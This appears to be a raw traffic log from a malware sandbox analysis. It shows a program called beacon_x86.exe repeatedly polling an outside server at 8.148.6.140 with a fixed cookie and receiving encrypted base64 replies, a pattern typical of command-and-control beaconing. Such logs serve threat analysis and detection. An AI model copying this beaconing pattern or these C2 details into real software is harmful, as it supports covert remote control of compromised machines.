        Jan 10, 2025 09:28:19.498692036 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:28:20.465106010 CET293INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:28:20 GMT
        Server: nginx
        Content-Length: 108
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 65 6c 76 62 5a 4b 57 6c 35 66 34 4d 4b 4d 6d 70 67 2b 4e 44 7a 6d 69 6e 36 53 30 72 6e 36 65 58 6f 53 73 36 65 49 32 4e 49 51 49 5a 75 4d 46 56 7a 4e 33 30 55 5a 64 6a 33 42 64 4b 56 7a 47 32 7a 51 51 72 4e 4d 7a 62 5a 7a 6b 48 46 62 73 79 6c 2f 36 4e 52 35 7a 4c 51 63 32 70 63 58 2b 59 46 72 63 2f 74 37 62 4f 48 4b 55 3d
        Data Ascii: elvbZKWl5f4MKMmpg+NDzmin6S0rn6eXoSs6eI2NIQIZuMFVzN30UZdj3BdKVzG2zQQrNMzbZzkHFbsyl/6NR5zLQc2pcX+YFrc/t7bOHKU=


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        72192.168.2.8497828.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:28:20.579029083 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:28:22.157716036 CET441INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:28:21 GMT
        Server: nginx
        Content-Length: 256
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 59 42 44 2f 65 68 6a 70 67 39 30 54 30 61 73 79 64 33 39 65 34 34 38 61 67 53 6f 67 45 37 58 70 62 33 44 36 61 79 36 44 31 65 47 59 32 51 4f 53 4e 2f 4e 66 4c 6f 68 30 35 51 34 79 4e 48 2b 48 73 36 4b 6b 4f 6f 33 45 48 6a 2f 64 46 48 38 58 43 63 78 67 4c 74 78 74 4a 76 69 6f 76 71 4c 76 4b 49 76 33 44 6a 74 41 58 68 5a 61 4e 79 31 42 76 51 59 41 45 69 53 62 57 56 35 6f 30 64 33 77 6f 55 54 4c 76 6c 2b 64 65 54 56 4e 55 30 63 4c 6d 35 74 4a 61 67 35 75 6f 68 38 58 46 6d 4e 34 44 56 34 73 69 72 51 78 74 63 31 68 7a 31 53 43 51 35 33 74 6a 47 62 30 56 34 5a 62 67 4b 67 41 41 4b 41 41 55 44 77 69 45 67 6a 68 39 79 78 48 64 42 50 79 57 52 41 56 78 72 71 75 70 6d 56 4b 7a 5a 53 66 33 37 66 50 74 30 2b 48 73 4e 6c 39 73 70 61 76 42 72 72 6a 62 74 32 68 36 6d 67 54
        Data Ascii: YBD/ehjpg90T0asyd39e448agSogE7Xpb3D6ay6D1eGY2QOSN/NfLoh05Q4yNH+Hs6KkOo3EHj/dFH8XCcxgLtxtJviovqLvKIv3DjtAXhZaNy1BvQYAEiSbWV5o0d3woUTLvl+deTVNU0cLm5tJag5uoh8XFmN4DV4sirQxtc1hz1SCQ53tjGb0V4ZbgKgAAKAAUDwiEgjh9yxHdBPyWRAVxrqupmVKzZSf37fPt0+HsNl9spavBrrjbt2h6mgT


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        73192.168.2.8497838.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:28:22.281745911 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        74192.168.2.8497848.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:28:26.359558105 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:28:27.488347054 CET293INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:28:27 GMT
        Server: nginx
        Content-Length: 108
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 59 76 55 77 48 67 6d 79 68 35 6a 43 6e 43 4d 51 38 4b 66 37 2f 6f 6c 46 54 79 72 68 36 37 42 62 71 63 52 55 4e 72 43 74 75 67 79 61 31 75 68 6d 6c 66 36 44 76 49 33 41 35 33 47 57 35 6d 38 39 43 61 42 71 76 7a 6a 78 59 53 30 37 43 6b 79 77 39 57 4f 4b 5a 71 75 4d 54 42 6c 65 41 70 4b 71 57 62 50 37 57 34 69 77 62 39 30 3d
        Data Ascii: YvUwHgmyh5jCnCMQ8Kf7/olFTyrh67BbqcRUNrCtugya1uhmlf6DvI3A53GW5m89CaBqvzjxYS07Ckyw9WOKZquMTBleApKqWbP7W4iwb90=


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        75192.168.2.8497858.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:28:27.609723091 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:28:28.561388969 CET505INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:28:28 GMT
        Server: nginx
        Content-Length: 320
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 49 59 75 73 75 6c 42 48 47 77 76 42 41 48 6e 58 75 2f 43 49 5a 62 6a 6e 37 55 32 53 63 4c 44 59 33 48 2f 50 69 62 67 38 65 6d 56 48 58 53 38 6f 55 63 54 51 47 77 32 63 54 69 73 4d 58 63 4a 70 4a 35 48 5a 6f 59 45 38 77 46 57 37 41 37 66 7a 76 36 64 65 6a 78 42 55 76 65 61 72 45 46 37 61 62 5a 4d 55 71 4e 56 51 44 2b 58 43 38 38 76 73 76 6b 75 57 74 6c 74 70 54 2b 52 76 41 71 48 42 6f 4f 46 67 59 54 6b 39 32 74 6c 44 30 6b 4b 65 43 4e 30 42 34 4c 54 55 64 49 63 57 39 67 71 75 73 6b 50 2f 6d 37 37 73 51 73 2b 49 44 37 4c 79 46 79 48 36 6c 6a 36 7a 58 66 6a 35 33 41 44 6d 2f 56 6e 6a 58 55 4b 44 6b 44 59 6a 32 37 73 30 7a 43 52 68 78 39 76 32 4e 41 30 44 4c 4d 62 7a 57 39 30 37 6b 75 34 78 69 57 52 61 67 51 70 34 49 78 6e 39 61 64 65 36 49 74 5a 62 62 6f 72 59 77 75 6c 38 51 6f 70 32 65 64 59 51 4e 46 59 77 4f 35 32 32 62 6a 58 2f 44 55 33 37 2b 2f 6c 52 62 59 4b 54 35 62 49 49 59 4e 31 69 59 32 67 31 56 67 55 4f 6b 75 59 76 30 44 4d 30 2f 71 51 51
        Data Ascii: IYusulBHGwvBAHnXu/CIZbjn7U2ScLDY3H/Pibg8emVHXS8oUcTQGw2cTisMXcJpJ5HZoYE8wFW7A7fzv6dejxBUvearEF7abZMUqNVQD+XC88vsvkuWtltpT+RvAqHBoOFgYTk92tlD0kKeCN0B4LTUdIcW9gquskP/m77sQs+ID7LyFyH6lj6zXfj53ADm/VnjXUKDkDYj27s0zCRhx9v2NA0DLMbzW907ku4xiWRagQp4Ixn9ade6ItZbborYwul8Qop2edYQNFYwO522bjX/DU37+/lRbYKT5bIIYN1iY2g1VgUOkuYv0DM0/qQQ


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        76192.168.2.8497868.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:28:28.686072111 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:28:29.683609962 CET465INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:28:29 GMT
        Server: nginx
        Content-Length: 280
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 65 68 41 55 73 50 74 66 36 41 39 61 36 36 50 34 67 37 77 55 6a 42 4e 44 78 68 4b 72 4f 54 63 39 56 38 7a 59 6f 77 45 4e 50 44 63 71 53 73 4e 71 76 61 30 39 53 74 2b 77 53 6c 4d 46 4f 66 6d 46 67 70 33 6a 58 4f 6a 51 55 44 69 6c 56 66 59 67 7a 49 5a 76 65 72 4c 48 42 35 71 35 30 62 4f 30 34 44 4e 68 75 62 65 77 42 76 4c 69 50 4c 36 68 2f 5a 4b 66 67 58 70 4e 43 77 2b 35 50 67 33 70 55 4b 6b 64 58 4b 55 59 4e 45 4b 6b 4a 65 7a 70 78 33 5a 73 64 69 45 74 57 38 4c 70 4b 35 6d 43 69 75 57 39 4e 67 4b 45 61 56 4b 42 61 37 63 6e 50 52 74 42 78 73 62 55 43 56 72 31 64 78 51 57 51 7a 2b 48 7a 33 73 78 30 76 4a 62 70 38 68 4a 4e 6b 38 62 33 2b 2b 4c 59 76 72 6c 32 54 4d 61 73 67 41 4d 4d 62 38 53 58 7a 73 61 61 58 6f 38 2b 76 5a 49 7a 6c 64 30 4b 75 44 45 41 53 6e 56 7a 50 75 4f 4a 50 31 71 59 62 58 35 63 33 44 4d 67 4d 76 51 4b 41 3d 3d
        Data Ascii: ehAUsPtf6A9a66P4g7wUjBNDxhKrOTc9V8zYowENPDcqSsNqva09St+wSlMFOfmFgp3jXOjQUDilVfYgzIZverLHB5q50bO04DNhubewBvLiPL6h/ZKfgXpNCw+5Pg3pUKkdXKUYNEKkJezpx3ZsdiEtW8LpK5mCiuW9NgKEaVKBa7cnPRtBxsbUCVr1dxQWQz+Hz3sx0vJbp8hJNk8b3++LYvrl2TMasgAMMb8SXzsaaXo8+vZIzld0KuDEASnVzPuOJP1qYbX5c3DMgMvQKA==


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        77192.168.2.8497878.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:28:29.812395096 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:28:30.808409929 CET465INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:28:30 GMT
        Server: nginx
        Content-Length: 280
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 56 58 51 33 77 48 6a 4f 57 51 37 72 6f 35 6a 66 50 57 41 6c 2b 33 72 49 58 37 57 37 78 30 49 66 79 48 6d 70 4f 6a 72 33 72 72 57 58 4c 63 4f 7a 48 79 38 79 61 5a 38 36 6d 6b 39 37 7a 42 77 6b 38 6d 34 44 2b 36 47 45 66 78 59 37 42 65 52 66 64 74 48 4c 66 69 54 6c 62 38 79 6b 4e 77 77 73 35 68 41 67 4f 69 6a 6c 54 4e 6d 2b 5a 63 73 49 39 77 4e 71 67 65 67 31 4e 43 53 73 6f 64 4e 7a 48 50 67 57 5a 6f 67 73 71 33 58 48 66 53 34 51 6c 62 64 31 2b 67 72 36 69 46 44 57 32 65 39 6e 62 4a 42 4c 62 4e 63 43 41 34 34 48 7a 75 59 73 2f 74 37 78 43 68 57 73 45 47 36 50 35 72 79 37 48 70 6f 68 66 4c 38 38 30 77 54 71 68 6b 47 38 31 2f 75 76 4e 41 4c 4c 72 4f 6c 34 63 79 53 66 6f 39 42 79 47 57 42 69 4a 39 45 44 49 37 57 66 78 41 68 56 75 75 68 69 62 59 37 4c 36 42 7a 6a 6e 79 63 59 75 41 76 74 39 79 79 37 46 30 59 41 38 34 41 30 6a 41 3d 3d
        Data Ascii: VXQ3wHjOWQ7ro5jfPWAl+3rIX7W7x0IfyHmpOjr3rrWXLcOzHy8yaZ86mk97zBwk8m4D+6GEfxY7BeRfdtHLfiTlb8ykNwws5hAgOijlTNm+ZcsI9wNqgeg1NCSsodNzHPgWZogsq3XHfS4Qlbd1+gr6iFDW2e9nbJBLbNcCA44HzuYs/t7xChWsEG6P5ry7HpohfL880wTqhkG81/uvNALLrOl4cySfo9ByGWBiJ9EDI7WfxAhVuuhibY7L6BzjnycYuAvt9yy7F0YA84A0jA==


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        78192.168.2.8497888.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:28:30.921494007 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        79192.168.2.8497898.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:28:31.889554977 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        80192.168.2.8497908.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:28:36.013983965 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:28:36.979285002 CET185INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:28:36 GMT
        Server: nginx
        Content-Length: 300
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Jan 10, 2025 09:28:36.979358912 CET300INData Raw: 47 62 6b 50 52 51 72 78 38 58 55 42 54 67 49 67 76 61 56 74 78 70 4f 78 4a 73 75 6b 6c 62 57 64 46 7a 45 6b 32 49 65 66 38 6c 4b 56 6f 38 4c 4c 4c 6f 76 69 35 5a 43 41 58 71 73 38 4d 59 43 47 42 66 6e 66 51 6b 56 2f 35 61 6f 57 6c 70 71 4c 77 79
        Data Ascii: GbkPRQrx8XUBTgIgvaVtxpOxJsuklbWdFzEk2Ief8lKVo8LLLovi5ZCAXqs8MYCGBfnfQkV/5aoWlpqLwy7hsvQpULQT+nN95mmJVcnrlV2E+M4qZGkl3tGWKwLqgLthsHh8Zt34ynZX4bfFQcfhlG1YRwFRPYPZRtETbmF8G0PZlwV6BcziBrvro5DpgOYVPpkgt6AwxOTy1ehx0waP1aZMuu/7VE7jx+1tWpWMrD+eQINYNcE


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        81192.168.2.8497918.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:28:37.101083040 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:28:38.083818913 CET421INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:28:37 GMT
        Server: nginx
        Content-Length: 236
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 36 79 47 58 6f 70 75 6b 73 76 35 56 63 6d 2f 58 43 6a 65 45 44 73 56 55 37 6a 62 4a 33 51 6d 4c 75 31 44 72 2b 78 76 6f 47 69 63 78 67 6f 43 39 6e 4d 70 78 45 65 50 49 77 32 59 44 56 4d 56 37 75 72 35 59 58 4f 31 55 36 61 57 75 49 69 78 2b 6b 71 72 71 38 36 31 78 75 4f 2f 6b 61 54 6a 42 77 44 2b 6b 62 76 2b 64 7a 44 77 56 2f 52 68 55 41 78 63 34 55 57 30 35 6f 42 55 4b 31 46 41 46 69 52 34 6c 72 4e 47 73 57 39 7a 49 6c 42 50 67 74 4f 2f 53 58 62 53 71 75 62 45 59 2f 34 6d 54 54 49 6c 55 6c 71 78 4c 54 51 65 33 43 48 62 35 69 6b 70 55 77 78 57 49 36 72 47 78 4f 4c 70 77 37 44 69 4c 53 44 49 4d 45 79 41 65 39 6e 30 47 35 56 49 37 38 51 51 5a 66 58 4a 53 45 67 4c 4c 72 63 30 4b 4d 76 2f 63 68 62 38 3d
        Data Ascii: 6yGXopuksv5Vcm/XCjeEDsVU7jbJ3QmLu1Dr+xvoGicxgoC9nMpxEePIw2YDVMV7ur5YXO1U6aWuIix+kqrq861xuO/kaTjBwD+kbv+dzDwV/RhUAxc4UW05oBUK1FAFiR4lrNGsW9zIlBPgtO/SXbSqubEY/4mTTIlUlqxLTQe3CHb5ikpUwxWI6rGxOLpw7DiLSDIMEyAe9n0G5VI78QQZfXJSEgLLrc0KMv/chb8=


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        82192.168.2.8497928.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:28:38.202440023 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:28:39.188714981 CET465INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:28:39 GMT
        Server: nginx
        Content-Length: 280
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 6f 49 51 6e 44 4a 54 75 4d 2b 44 53 73 71 55 45 77 67 4a 70 4f 63 52 71 47 44 4f 4c 4f 66 66 47 4d 6c 73 61 42 6f 31 4b 52 76 39 41 71 6c 59 55 54 56 6b 69 69 38 55 5a 67 7a 48 63 36 33 53 6a 65 53 64 47 6e 50 71 62 70 49 5a 56 4f 6b 32 33 41 4c 49 2f 37 54 76 59 44 75 45 64 51 45 62 50 6a 4c 58 77 6a 4b 71 36 6f 4b 71 54 4d 4f 53 4c 53 61 67 48 4f 32 4b 30 6f 70 42 6d 46 72 48 69 53 73 30 69 4c 7a 47 62 71 36 54 4a 50 4f 76 4d 43 51 74 52 6f 31 30 38 43 70 76 52 64 4e 45 2f 72 38 71 70 79 72 76 70 34 49 44 67 4a 76 44 4f 4d 63 4b 67 7a 65 44 70 64 32 73 62 79 73 2f 66 35 4b 4a 4d 2f 37 74 54 32 51 56 75 45 56 77 6a 44 74 32 32 68 38 4f 58 7a 75 48 65 34 36 32 41 47 38 73 37 6a 44 6b 41 4c 71 6e 68 41 63 75 50 61 46 75 35 6f 2f 6d 6f 63 6b 49 79 34 61 51 4f 38 73 32 4e 35 52 61 6a 73 4c 6a 2b 33 51 30 6e 4f 72 6d 6d 47 51 3d 3d
        Data Ascii: oIQnDJTuM+DSsqUEwgJpOcRqGDOLOffGMlsaBo1KRv9AqlYUTVkii8UZgzHc63SjeSdGnPqbpIZVOk23ALI/7TvYDuEdQEbPjLXwjKq6oKqTMOSLSagHO2K0opBmFrHiSs0iLzGbq6TJPOvMCQtRo108CpvRdNE/r8qpyrvp4IDgJvDOMcKgzeDpd2sbys/f5KJM/7tT2QVuEVwjDt22h8OXzuHe462AG8s7jDkALqnhAcuPaFu5o/mockIy4aQO8s2N5RajsLj+3Q0nOrmmGQ==


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        83192.168.2.8497938.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:28:39.317768097 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:28:40.258126974 CET505INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:28:40 GMT
        Server: nginx
        Content-Length: 320
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 43 72 6f 62 2f 70 59 53 56 5a 39 48 75 4e 4e 6d 48 71 51 68 42 50 59 51 62 74 41 4b 7a 47 71 4c 4e 45 55 4d 74 41 70 64 74 36 4e 36 5a 6d 4d 73 45 75 50 69 4a 70 47 44 4b 55 44 6a 47 45 6b 78 47 6b 69 51 55 50 75 78 41 6e 74 56 74 72 6e 6b 65 39 79 48 32 67 6b 68 76 73 36 4e 58 52 6c 72 43 6f 35 33 7a 79 6f 57 78 62 44 59 6e 47 35 4e 72 6e 74 2f 68 7a 65 35 64 37 6d 79 4e 63 6b 71 57 56 6c 55 78 59 77 34 42 64 57 38 2f 72 77 46 64 4b 58 65 7a 44 73 53 37 77 59 77 61 42 38 45 6a 2b 4b 42 62 47 30 45 63 46 51 34 47 79 4c 6c 31 75 45 69 42 61 4a 2b 49 4c 4a 76 33 37 57 2b 58 42 42 54 55 6e 41 77 64 61 43 39 38 39 31 36 67 4b 63 30 4f 4d 57 52 6c 56 76 71 79 6d 58 63 52 61 39 41 73 4c 57 39 56 66 53 4d 